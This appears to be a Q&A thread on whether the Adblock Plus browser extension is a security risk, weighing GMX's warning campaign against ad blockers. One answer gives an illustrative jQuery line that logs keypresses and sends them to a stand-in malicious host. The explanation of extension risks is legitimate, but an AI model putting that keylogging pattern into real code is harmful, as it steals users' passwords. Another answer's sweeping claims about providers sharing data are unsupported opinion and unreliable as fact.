Is Adblock (Plus) a security risk?

Question

My email-provider's website (http://www.gmx.de) recently started linking to the (German) site http://www.browsersicherheit.info/ which basically claims that due to its capabilities to modify a site's appearance, Adblock Plus (and others) might actually be abused for phising. Here's a quote from that site plus its translation:

Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben – auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

translated:

Such addons can access all your browser's input and can also forward them to third parties - even your banking password. This can happen on all websites. Security mechanisms such as SSL cannot avoid that.

Ok, they mention other (pretty obviously crapware) addons, but is Adblock Plus really a security threat or do that site's operators simply use the opportunity to try and scare inexperienced users into viewing their ads again?

Answer 1

It is not. This is a FUD (fear, uncertainty, and doubt) campaign by GMX because they want to display their ads. There is absolutely no security risk from the mentioned ad blockers. They added some crapware to the list to make it look more legitimate.

Of course such campaigns are very unusual, especially from such a big and well known company like GMX. Unfortunately, I have no English source at hand (because it's a German only campaign) but since you speak German you may want to read this article at heise.de.

Update #1: United Internet, the company behind GMX, received a lot of criticism for misleading customers by falsely claiming that there is a security risk on their PC. The Wall Street Journal (German edition) named the warnings displayed on GMX and the site they link to a "scare campaign".

Update #2: GMX now says that they will no longer display the link when you use ad blockers but will still display it if you use crapware that injects adverts, the list at the site http://www.browsersicherheit.info/ has been updated accordingly and now lists only a small collection of crapware. This list is by no means complete so it is not a reliable source when you want to know if your browser has crapware installed. However, United Internet still maintains it's position that they do not want users who visit their sites to use ad blockers and said they will develop other anti-blocking methods in the future (German source).

Answer 2

Update

After thinking it over, I have to agree with the other answers in that, despite the fact that it CAN access your data, Adblock is more likely to protect your privacy than invade it. The real risk are malicious ads that prompt you to install software on your computer. Adblock prevents these.

Below is the original, cautionary answer:

Yes, it totally is.

Adblock Plus is a browser extension/add-on developed by an independent developer. Adblock can access the DOM (document object model) on all pages.

The way AdBlock works is that it injects script into your browser, which searches the DOM, and then runs a hide() function on what it determines are ads.

That means AdBlock (and any Chrome extension with that permission) can access your DOM. Adblock cannot access JavaScript variables.

What does this mean?

If you are on a website with secure authentication, and there is a JavaScript object with something private like an AuthKey, you are safe. AdBlock cannot access JavaScript variables.

However, AdBlock CAN run code equivalent to this.

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

Which essentially will route any keys you press to a remote server.

This can be used to steal your password which is even worse than stealing your token.

That Being Said, Is AdBlock itself Dangerous?

It seems to me that AdBlock is not overly dangerous as the developer has identified himself and it is used by millions of people. If it was doing the kind of trickiness as above, someone would have likely noticed and blown the whistle.

But don't think Chrome Extensions are totally safe. All of them can steal any data, as well as other malicious things.

What Else Can It Do?

A Chrome Extension can also perform the following security violations quite trivially...

• Route the content of any email or page you read to a third-party source (if this email contains unencrypted login information, you are busted) If you can see it on the screen, so can any Chrome Extension, no questions asked.
• Enter information into a field and press the submit button, for example, send an e-mail
• If you leave your browser open, and the extension knows how, it can use your email interface (Gmail, Outlook) to send e-mail of its choosing to your contacts. This is trivial.
• Change the script associated with any button, if that was originally put in with jQuery. For example, the button that sends your sign-in information to the server can be changed slightly to send that information to both the server and http://mymaliciousserver. This is trivial.

Update

It has been verified through discussion that AdBlock is open source. This should let you trust AdBlock more, but remember it is still capable of doing those things. I've reviewed the source and I can safely say I haven't any idea at all what's going on.

Source: I am a JavaScript and Chrome Extension developer.

Answer 3

This really comes down to an issue of trust. It is true that today, the AdBlock extension is safe. We know that it will not steal your data, even though—as the other answers point out—it has the technical ability to do so.

However, Chrome extensions are silently and automatically updated.

Do you trust that the developer of the AdBlock extension will not add malicious code? I personally do – with millions of users, malicious code would be noticed quickly and would undoubtedly be a career killer for the developer.

Even if you do trust the developer, there are still unlikely scenarios that could expose you:

• The developer's Chrome Store account could get hacked and the attacker could release a malicious update.
• The developer might sell the extension to a less scrupulous party.
• Someone might encourage the developer to push malicious code.

For the paranoid, these issues could be mitigated by:

• Only logging in to sensitive sites (ie banking) using Incognito mode (where extensions are disabled by default).
• Disabling automatic extension updates, but you obviously lose a lot of convenience.

So while it is intellectually dishonest to say, "no, there is no risk," the risk is completely overblown by GMX. Just as I trust Google to give me a browser that does not steal my personal data, I trust the AdBlock developer to give me an extension that does not steal my data.

The risk of the extension being updated with malicious code is small enough that I don't worry about it, and if I did have the slightest concern, it's easy enough to disable the extension.

Answer 4

All software is a security risk, but in this case their claim is misleading.

Just like all advice is potentially bad and and all transactions are potentially fraudulent. "Risk" just means your security isn't guarenteed, with is true in 100% of cases.

But in the case of AdBlock Plus, the software is well-understood and developed by a team that has a track record of protecting the interests of its users. Plus it's open-source, so the source code is available for you to examine yourself for any security issues. So in this case, the risk is minimal; trivial even.

Instead, GMX is using a truism ("software is always risky") to suggest that this software is dangerous, which is misleading at best, and possibly defamatory. It's like a resturaunt owner handing out leaflets saying his competitors could be poisoning their own food. Technically it's true, since you said "could be" instead of "are", but the action is fundamentally dishonest nonetheless.

Answer 5

Just an observation - I tend to promote ad blockers especially for my less savvy friends and associates - precisely because it reduces security threats. How? Because much of the most malicious content on the web comes in the form of a misleading advertisement like "click here to make your pc faster"... These largely disappear with an ad blocker.

Answer 6

Adblock (as other extensions and, for that matter, browser developers) has the technical ability to get a lot of your data, and you have all the risks commonly associated with running third-party applications - namely, that the vendor can be malicious, and there may be bugs in their software that break your security.

That being said, I'd consider AdBlock as a defence against phishing. A lot of questionable software gets pushed to users through ads masquerading as something else - i.e., a site offers some item that a user wants, but has an ad that looks like a download button, and delivers some adware/malware product instead of the actual content on site, and such 'accidentally' downloaded malware is a serious security risk. Similarly, there have been incidents of mass consumer attacks by running an ad banner containing a zeroday exploit, which would cause the exploit to appear on respected, well trusted sites.

For company-wide security practices, it may make sense to require AdBlock and install it by default on every workstation - since it is especially useful to protect the inexperienced users who wouldn't install it themselves. This would cause a risk by trusting one more software product, but would be a net positive for everyday security.

Answer 7

The way this information is spread by United Internet is misleading (I am trying hard to avoid saying "libel"). The allegation as it stands is clearly wrong by all objective means, and the presentation is defamatory.

Of course, in principle, one has to admit that Adblock (Plus) is of course a potential security risk. Whether this risk warrants a reasonable concern is another thing.

Adblock (Plus) might be a security risk for three reasons:

1. It is software that runs on your computer, which could, like all software, in principle do almost anything. Including showing false information or stealing your data.
2. It does modify web page contents, that is what blocking ads is about. Certainly, a software which is well-known to modify the contents of web pages could modify the contents in a malicious way and go unnoticed much easier than another software.
3. It performs this task by matching a downloadable list of regular expressions from a range of (uncontrolled/unknown) third parties, such as EasyList

So, if you are in ultra-paranoia mode, you might fear that either someone at EasyList (or another filter list provider) modifies the filter list so they do something malicious, or a hacker hijacks the site. Your Adblock Plus addon would presumably download the malicious list during its daily/weekly update without knowing and without a means of verification (there is a checksum that can be embedded, but this only protects from accidential corruption, not malicious modification).
As a result, such a malicious block list could in theory cause the addon to do "evil things".

Luckily, apart from JS exploits, there is not too much harm that could realistically be done via this attack vector due to the way Adblock works (it will match an arbitrary regex, but it won't do arbitrary susbstitutions, so hiding some elements it shouldn't hide or letting some ads through is pretty much the worst possible case).
On the other hand, a JS exploit could be used against you without Adblock Plus running in the first place.

Also, obviously, like any third party software (including Firefox or Chrome itself!) the Adblock Plus addon itself could steal your data. All you can say at the present time is that so far this has not happened.
Then again, almost all of the big commercial players in the business are doing untrustworthy things on a daily base, which nobody objects against.

Now you have to ask yourself how likely it is that Adblock Plus will indeed steal user data, and how likely it is that such a thing would go undetected for longer than a day or two on a widely-deployed open-source project.

Frankly, if you believe that this is a serious and realistic threat which is likely to affect you, then you must also believe that the Microsoft in collaboration with the NSA already builds identity theft functionality right into Windows and that every computer has a secret "kill switch" which the US DoD can activate at will (that too, is in principle possible, and it's actually more likely to be true than the author of Adblock stealing your savings).

You should not trust GMX either in this case, since they will (note the wording, will, not may) share all your personal data and traffic information in a malicious and unethical way with other parties (at least with US agencies, due to Schröder's 2001 treaty, but you have no way of telling with whom else).
You also shouldn't trust 1&1 (another member of United Internet) because they will share your personal data with who-knows-whom (being an US based company). Nor Google, nor the other half of the internet for that matter.

On the other hand, Adblock Plus has demonstrably prevented malware from being installed on users' computers in the past.

Answer 8

The other answers forget to mention the issue aside from trust: That adblock is modifying pages you visit. This and having to trust more developers is why I have never used ad blocking software/browser plugins, and strongly recommend against it.

It is well known that websites depend on all kinds of fragile invariants for security. For example, just look at the ways clickjacking has been addressed in the past. There is nothing stopping adblock from mistakenly violating an invariant that the site depends on for security.

Also adblock and other ad blocking software decrease anonymity. An adversary can either make you run code to browse the DOM tree and look for missing parts / alterations, or passively observe that you aren't making certain requests to fetch ad-related content (some of which may be hosted on the site itself, making it a possible adversary).

Answer 9

Something no-one has mentioned here is that Adblock plus along almost all other browsers and extensions can be updated remotely. This means there must be a backdoor in the program even if it is locked down to specific "trustworthy" update URLs. This could be interpreted as spyware, but spyware is a somewhat abstract term.

It's true that most people have said it is not safe as it has permissions to read and send data although it's widely accepted that Adblock plus in particular is not malicious. Despite for the most part being open source (Adblock included) browser software and extensions are only as secure as the update URLs for which there is no way of knowing how secure they actually are as the code for these services is remote and therefore not accessible.

Obviously no software or server can be 100% secure due to entropy and having users, but to obtain the highest possible security you should study the source code, always build from source and disable automatic updating. Like with all software, browsers and extensions are only as secure as the user makes them.